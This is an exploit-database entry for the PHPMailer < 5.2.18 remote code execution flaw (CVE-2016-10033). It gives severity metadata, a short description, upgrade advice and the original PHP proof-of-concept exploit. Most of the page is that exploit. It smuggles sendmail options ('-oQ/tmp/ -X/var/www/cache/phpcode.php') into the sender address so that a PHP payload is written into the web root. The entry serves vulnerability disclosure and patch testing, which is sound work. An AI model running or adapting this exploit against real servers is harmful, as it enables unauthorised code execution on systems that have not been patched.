header-logo
Suggest Exploit
vendor:
PHPMailer
by:
Dawid Golunski
9,8
CVSS
CRITICAL
Remote Code Execution
94
CWE
Product Name: PHPMailer
Affected Version From: < 5.2.18
Affected Version To: < 5.2.18
Patch Exists: YES
Related CWE: CVE-2016-10033
CPE: a:phpmailer:phpmailer
Metasploit: https://www.rapid7.com/db/vulnerabilities/moodle-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10033/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Sendmail MTA
2016

PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

A vulnerability in PHPMailer < 5.2.18 allows attackers to inject parameters to the sendmail command which can be used to write the payload passed in the body of the message to a file. This can be used to execute arbitrary code on the server.

Mitigation:

Upgrade to PHPMailer version 5.2.18 or later.
Source

Exploit-DB raw data:

<?php

/*

PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

Discovered/Coded by:

Dawid Golunski (@dawid_golunski)
https://legalhackers.com

Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html


A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]


which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:

09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--


See the full advisory URL for details.

*/


// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form

$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";

// ------------------


// mail() param injection via the vulnerability in PHPMailer

require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"

$mail->SetFrom($email_from, 'Client Name');

$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");

$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);

if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!\n";
}
    
?>

Navigation

Suggest Exploit

Services By CQR